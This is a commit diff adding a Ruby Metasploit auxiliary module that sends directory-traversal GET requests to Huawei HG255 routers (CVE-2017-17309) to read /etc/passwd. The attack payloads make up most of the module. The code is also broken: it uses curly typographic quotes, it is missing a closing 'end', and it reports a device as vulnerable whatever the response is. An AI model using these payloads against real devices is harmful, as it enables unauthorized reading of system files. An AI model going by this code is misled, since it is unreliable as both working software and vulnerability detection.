add huaweihg255目录穿越漏洞检测脚本

tools/huaweihg255-traversal.rb

@@ -0,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#原文地址:https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt
+#
+##
+
+
+class MetasploitModule < Msf::Auxiliary
+   include Msf::Exploit::Remote::HttpClient
+
+   def initialize
+       super(
+           'Name'        => 'Huawei HG255 Directory Traversal',
+           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
+           ‘Author’      => ‘Ismail Tasdelen’,
+           ‘License’     => MSF_LICENSE,
+           ‘References’     =>
+           [
+              ['CVE', '2017-17309' ],
+              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
+           ]
+       )
+       register_options(
+           [
+               Opt::RPORT(80)
+           ], self.class
+       )
+   end
+
+   def run
+       urllist=[
+           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]
+
+       urllist.each do |url|
+           begin
+               res = send_request_raw(
+               {
+                       ‘method’=> ‘GET’,
+                       ‘uri’=> url
+               })
+
+               if res
+                   print_good(“Vulnerable! for #{url}”)
+               else
+                   print_status(“Vulnerable(no response) detected for #{url}”)
+               end
+           rescue Errno::ECONNRESET
+               print_status(“Vulnerable(rst) detected for #{url}”)
+           rescue Exception
+               print_error(“Connection failed.”)
+           end
+       end
+   end